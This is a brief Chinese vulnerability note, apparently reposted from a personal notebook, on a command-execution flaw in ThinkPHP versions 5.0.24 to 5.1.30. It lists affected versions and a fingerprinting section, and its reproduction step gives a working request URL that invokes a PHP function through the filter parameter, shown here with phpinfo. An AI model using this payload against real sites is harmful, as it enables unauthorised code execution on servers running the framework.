登录 白背景
源码

thinkphp 5.0.24-5.1.30版本存在命令执行漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.84);">ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。thinkphp 5.0.24-5.1.30版本construct存在命令执行漏洞</font>

<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>

  • ThinkPHP 5.0.24-5.1.30

三、资产测绘

  • 特征

1729963808032-4c0b07bd-8822-4e62-b42e-1f5cc02152fd.png

四、漏洞复现

/?s=index/\think\Request/input&filter[]=phpinfo&data=-1

1729967163631-857fa123-5c45-4d1e-b7f7-ed25453a2b9f.png

原文: https://www.yuque.com/xiaokp7/ocvun2/oa5suisgyzr6etfs